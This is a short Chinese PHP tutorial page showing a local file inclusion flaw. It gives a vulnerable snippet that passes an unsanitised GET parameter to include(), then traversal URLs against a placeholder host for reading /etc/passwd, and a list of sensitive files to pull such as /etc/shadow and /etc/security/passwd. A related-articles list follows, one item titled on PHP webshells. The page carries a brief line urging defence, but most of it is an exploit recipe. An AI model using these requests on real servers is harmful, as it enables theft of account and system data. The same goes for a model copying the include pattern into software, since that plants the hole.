php 偽造本地文件包含漏洞的代碼

更新時間：2011年11月03日 23:33:36 作者：

php 偽造本地文件包含漏洞的代碼,大家一定要注意防范。

代碼:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

來自hackteach

您可能感興趣的文章:

包含漏洞

php正則提取html圖片(img)src地址與任意屬性的方法
下面小編就為大家?guī)硪黄猵hp正則提取html圖片(img)src地址與任意屬性的方法。小編覺得挺不錯的，現(xiàn)在就分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2017-02-02
PHP中使用crypt()實現(xiàn)用戶身份驗證的代碼
在開發(fā)PHP應用中如果不想自己開發(fā)新的加密算法，還可以利用PHP提供的crypt()函數(shù)來完成單向加密功能
2012-09-09
phplock(php進程鎖) v1.0 beta1
PHP在多進程模式下（并發(fā)的web訪問）由于沒有內(nèi)置的鎖支持，在處理一些資源的之后，很容易出現(xiàn)并發(fā)性問題。
2009-11-11
PHP函數(shù)checkdnsrr用法詳解(Windows平臺用法)
這篇文章主要介紹了PHP函數(shù)checkdnsrr用法,分析講解了在Windows平臺使用checkdnsrr函數(shù)的方法,需要的朋友可以參考下
2016-03-03
PHP依賴注入容器知識點淺析
在本篇文章里小編給大家分享的是一篇關于PHP依賴注入容器知識點內(nèi)容，有興趣的朋友們可以學習下。
2020-01-01
PHP與SQL語句寫一句話木馬總結(jié)
在本篇文章里小編給大家整理的是關于PHP與SQL語句寫一句話木馬的相關知識點，有需要的朋友們學習下。
2019-10-10
PHP生成各種隨機驗證碼的方法總結(jié)【附demo源碼】
這篇文章主要介紹了PHP生成各種隨機驗證碼的方法,結(jié)合具體實例形式總結(jié)分析了php常用的生成驗證碼操作相關技巧,并附帶demo源碼供讀者下載參考,需要的朋友可以參考下
2017-06-06
用PHP讀取flv文件的播放時間長度
用PHP讀取flv文件的播放時間長度的代碼，需要用的朋友可以參考下。
2009-09-09
php中mail函數(shù)發(fā)送郵件失敗的解決方法
這篇文章主要介紹了php中mail函數(shù)發(fā)送郵件失敗的解決方法,涉及針對Linux運行平臺相關組件的配置技巧,具有一定的參考借鑒價值,需要的朋友可以參考下
2014-12-12
PHP通過GD庫實現(xiàn)驗證碼功能示例
這篇文章主要介紹了PHP通過GD庫實現(xiàn)驗證碼功能,結(jié)合實例形式分析了php驗證碼相關圖片繪制、輸出操作實現(xiàn)技巧,需要的朋友可以參考下
2019-02-02